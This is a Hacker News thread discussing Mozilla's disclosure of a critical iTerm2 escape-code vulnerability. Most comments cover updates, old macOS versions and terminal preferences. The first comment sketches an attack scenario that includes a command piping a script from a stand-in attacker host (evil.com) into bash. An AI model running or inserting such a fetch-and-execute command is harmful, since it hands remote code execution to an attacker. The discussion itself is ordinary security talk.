
Critical Security Issue Identified in iTerm2 - sciurus
https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/
======
earthboundkid
I take it the nightmare scenario here is that you have web logs streaming in a
tmux window and an attacker accesses /404/escape-code/curl -s
[http://evil.com/pwn|bash](http://evil.com/pwn|bash)? Does the window need to
be foregrounded for the attack to work? I guess the good news is that iTerm is
Mac only, so I can't imagine that many web servers are using it.

~~~
stygiansonic
Why would the web server need to be running macOS? From my understanding an
admin could be ssh’d into a server and tailing/gripping the logs there while
using iTerm. If the malicious input was in the logs, then the attacker could
take over the admins machine, and by extension, possibly any machine the admin
had access to.

~~~
earthboundkid
Good point.

------
gnachman
iTerm2 author here. I’ll be glad to answer questions.

~~~
jlokier
Thanks for iTerm2. I've used it every day for years.

I'm running 3.0.15 and it reports no updates available.

On MacOS 10.9 (upgrading isn't really an option right now, it would break too
many things).

Is iTerm2 3.0.15 vulnerable?

Thanks!

~~~
jlokier
I'm puzzled by the downvote, as my question seems appropriate to me. Anyone
care to provide feedback? Thanks.

~~~
ffritz
Dude, you are running a version that came out 6 years ago, while macOS has a
yearly release schedule. iTerm would be the least of my concerns. There is
just nothing to say here other than go and upgrade it asap.

~~~
klmr
While you’re right, it’s unfortunately not that simple because macOS updates
really do break a lot of stuff (especially for developers) and, on older
hardware, degrade performance to the point of un-usability. I’ve got an MBP
from 2012, and I’ve stopped updating macOS with Sierra (10.12) due to ever
degrading performance. I’ll be forced to throw away the (perfectly
functional!) laptop at some point once I stop receiving security updates.

~~~
dlivingston
> macOS updates really do break a lot of stuff (especially for developers)

Weird example, as most of your users will be using a more recent version of
macOS. So, while you're code isn't 'broken' for you, on your 6+ year old OS,
it's broken for the vast majority of end users who will want to compile your
code.

~~~
jlokier
Weird response. Probably most developers are not shipping code for end users
to compile.

Of those, most are probably developing websites and webapps, and the only
thing about the end user that matters is which browser, not which OS, let
alone version.

But there are also developers writing apps that include older devices in their
target. That means avoid the newest Mac tools because you can't compile for
old enough targets on it.

Then there are Mac app developers that include older versions of the OS in
their target market, and have to use older tools to ensure the target range is
covered. This gets harder over time because Apple makes it deliberately hard.

Some of them even write mobile apps that target users of older devices.
Shocking, I know, but there are a lot of users of older iOS devices these
days, and sometimes you're tasked with making an app for them.

Then there are developers whose work talks to dev hardware attached to the
computer, which needs drivers, which stop being supported at some OS version.
The end users get a lump of hardware, and all the developer needs is an OS
that can talk to the dev kit.

Then there are developers doing maintenance on older MacOS, iOS, or device
firmware, and produce updates that are drop-in compatible to exactly the same
set of target users as are already running the software. Not every consumer
app will bother with this, but some business-critical things demand it.

I think the use case of "end users who will want to compile your code" is
almost negligably small in comparison, and Linux is probably a better OS for
doing that sort of thing anyway :-)

I've done all the above, on Mac, Windows, and Linux. VMs work great for Linux,
and ok for Windows. Mac is a pain for this, because of Apple's policies to try
to make it difficult.

~~~
dlivingston
> most are probably developing websites and webapp

And you can't port your NPM, React, etc. environment over to a new OS without
breaking things?

> the only thing about the end user that matters is which browser

As a web dev, you want to use the latest ES/HTML/CSS specs while still
targeting as many users as possible. How can you target modern users when the
browsers on your 6-year old system isn't up-to-date enough to render what most
users will see?

> Then there are Mac app developers that include older versions of the OS in
> their target market, and have to use older tools to ensure the target range
> is covered. This gets harder over time because Apple makes it deliberately
> hard.

This is a valid point. There are still people compiling on and for Windows XP
and MS-DOS machines, after all. Hell, you can find hobbyists who only like
writing Commodore 64 programs. Writing to target older platforms is hyper-
niche and the computer you use to do that shouldn't be your main workstation.

> Shocking, I know, but there are a lot of users of older iOS devices these
> days, and sometimes you're tasked with making an app for them.

In which context? Given that 97% of devices are on iOS 11 or later
([https://twitter.com/reneritchie/status/1159288325003460609](https://twitter.com/reneritchie/status/1159288325003460609)),
I can't imagine _why_ you care about those users.

> Then there are developers whose work talks to dev hardware attached to the
> computer, which needs drivers, which stop being supported at some OS
> version. The end users get a lump of hardware, and all the developer needs
> is an OS that can talk to the dev kit.

This is a valid point.

> Then there are developers doing maintenance on older MacOS, iOS, or device
> firmware, and produce updates that are drop-in compatible to exactly the
> same set of target users as are already running the software. Not every
> consumer app will bother with this, but some business-critical things demand
> it.

A valid point as well - this is exactly the context in which COBOL is still
used.

> I think the use case of "end users who will want to compile your code" is
> almost negligably small in comparison, and Linux is probably a better OS for
> doing that sort of thing anyway :-)

That's...not true. macOS developers exist, you know, and there's a reason that
Macs ship with a strong tooling kit.

Besides, if you distribute dynamically-linked binaries, you want an up-to-date
OS so that the dylibs you're linking to actually exist...

Just some thoughts from a junior dev :)

~~~
jlokier
> As a web dev, you want to use the latest ES/HTML/CSS specs [...]. How can
> you target modern users when the browsers on your 6-year old system isn't
> up-to-date enough to render what most users will see?

You can run latest browsers just fine. I'm talking to you now through Firefox
Beta that was released a couple of days ago, on my 6 years old OS. It works
just great, latest ES/HTML/CSS specs and all, same as yours. It's more up to
date than my phone!

However, if you're serious about testing, portability, accessibility,
inclusion, quality, and just looking good to a worldwide audience for your
site or app, then you won't rely on testing in a single browser on your own
machine.

Especially if your own machine is running the latest bleeding-edge version (as
mine is). You may be using something like Selenium, BrowserStack, Sauce Labs
etc. with a testing pipeline. Or (as I do), a bunch of browsers in cloud-based
VMs.

Even if it's just a manual testing pipeline, there are so many ways a complex
web app can render or behave differently on different browsers it's not funny,
so well worth testing complex things.

Imagine trying to write something like a mini Google Sheets or Docs without
testing on different browsers, while intending for it to be usable to a wide
audience. It would break in more ways than you could imagine from testing only
on the latest browser on your own machine.

> Given that 97% of devices are on iOS 11 or later [...] I can't imagine why
> you care about those users.

Not all apps are for consumers.

And not all apps are for distribution on an app store.

And some on a store are for particular audiences. For example government apps,
financial services apps targetting people with little cash, and those running
on fleets of purchased devices in a business (such as tablets) for a dedicated
purpose.

E.g. one of those I've dealt with was effectively a museum full of tablets
fixed in place. Nodody's going to purchase new hardware in quantity if the old
ones are working fine, just to please a developer who can't figure out how to
built for an old target. (When I did that job, it wasn't iOS, but the same
principle applies.)

> A valid point as well - this is exactly the context in which COBOL is still
> used.

I wonder if you're trying to suggest "really really old" with COBOL :-) The
same maintenance issues apply to maintaining apps released just a couple of
years ago, which supported 5 year old devices at the time they were released,
and so aim to maintain the same until they have a major version change.

(Especially business apps rolled out on a fleet of purchased devices, where
continuity is a requirement. But also, consumer apps if you care about the
customers.)

> macOS developers exist, you know

I do know, where do you think this thread came from :-)

But the vast majority of shipped code is not open source, and when it is, most
of it is used only on servers or inside devices.

------
ohadron
I clicked "Check for updates", saw that there is an update ready to install.
Once installed I compared the version number and it wasn't the latest. I
probably missed an update in the past.

Make sure that after reinstallation you're at v3.3.6+

------
pwinnski
I checked for update, installed and relaunched... and found that all my tabs
were exactly as they were before, including my tab that had an ssh tunnel
running. The only thing that changed was that iTerm got more secure.

Impressive work, gnachman.

~~~
jki275
what??? Mine dumped all my windows and gave me back just one blank terminal
window. I got robbed!

~~~
gnachman
If you have non-native fullscreen windows it's Apple's fault. They don't like
this window style so they don't support restoring it. Could also be that you
have "System Prefs > General > Close windows when quitting an app" turned on,
or that you have iTerm2's "Prefs>General>Startup>Window restoration policy"
set to something other than "Use system window restoration policy"

------
vosper
I'm sure there are a lot of people reading HN who use iTerm2 every day. For me
it's an essential tool.

If that's you, and you're not already a contributor to the continued
development of this software, then today is a great day to start!

There's a Patreon, so for many people it'll be very easy to begin helping out:

[https://www.patreon.com/gnachman/overview](https://www.patreon.com/gnachman/overview)

(I have no affiliation with iTerm2 or it's author; I just want to encourage
people to support important software)

~~~
otachack
Definitely a ton of users. IMO though, I've just used the stock Terminal on
macOS for the past 4 years or so. I don't see my self using any of the
features iTerm2 brings to the table.

~~~
tengbretson
If you're proficient with tmux I'm not exactly sure what iTerm brings to the
table.

~~~
jefftk
Can tmux do focus-follows-mouse for selecting between panes? (Last time I
looked into it this wasn't possible)

~~~
lonelappde
Why would you use that over keyboard switching?

FFM is used when you have overlapping windows and want to focus a window
without raising it.

~~~
jefftk
Personal preference? I have always liked FFM, and while I like the keyboard
for many things I find it much more awkward than the mouse for selecting among
many (10+) terminals tiling the screen.

(I don't want overlapping windows for anything, never have, and am still sad I
can't get OS-wide FFM on a mac.)

------
symlinkk
What's the exploit? I keep clicking links trying to figure it out and no one
says what it actually is.

~~~
lincolnq
I think it's something to do with: iterm2 interprets <magic control sequence>
as triggering the tmux integration feature. But you can put that magic control
sequence into other places.

~~~
Dylan16807
Sure, but that explains nothing about how the tmux integration ends up running
a local command. How is this doing anything more than confusing the terminal
about buffers?

------
lrc
(OT) I like iTerm for its smart select/copy behavior, mostly, but stopped
using it about 3 months ago because I often caught it using immense amounts of
RAM, slowing everything down on my 32Gb trashcan pro. I thought it might have
something to do with the GPU, but it doesn't happen on Terminal.app, which is
otherwise good enough, but I miss iTerm every time I have to cmd-C or adjust
the span of a double click. Has anyone else observed the RAM trouble? Maybe I
have a bad setting?

~~~
gnachman
Probably a memory leak. I’d love to get a heapshot to debug it. See
instructions at [https://iterm2.com/bugs](https://iterm2.com/bugs)

~~~
lrc
Thank you, I will do this.

------
i_cant_speel
This got me to actually update and I love the new minimal theme. I also like
having CPU/Memory usage statistics in the status bar.

------
JohnBooty
Thank you, Mozilla. =)

~~~
yread
And congrats Radically Open Security

------
vagab0nd
Serious question: I've heard great things about iTerm2. I'm on Linux running
xterm and a tiling window manager. What am I missing out on?

~~~
root_axis
For the mac, it's the best there is, but if you're on linux gnome-terminal is
better.

~~~
veidr
Wait, do you mean "if you're on linux gnome-terminal is better _(because if
you 're on linux you can't use iTerm2)_?"

Because that's the only way your comment makes sense to me.

~~~
root_axis
What I mean to say is, gnome-terminal > iTerm2, but if you're on a mac, iTerm2
is the next best thing.

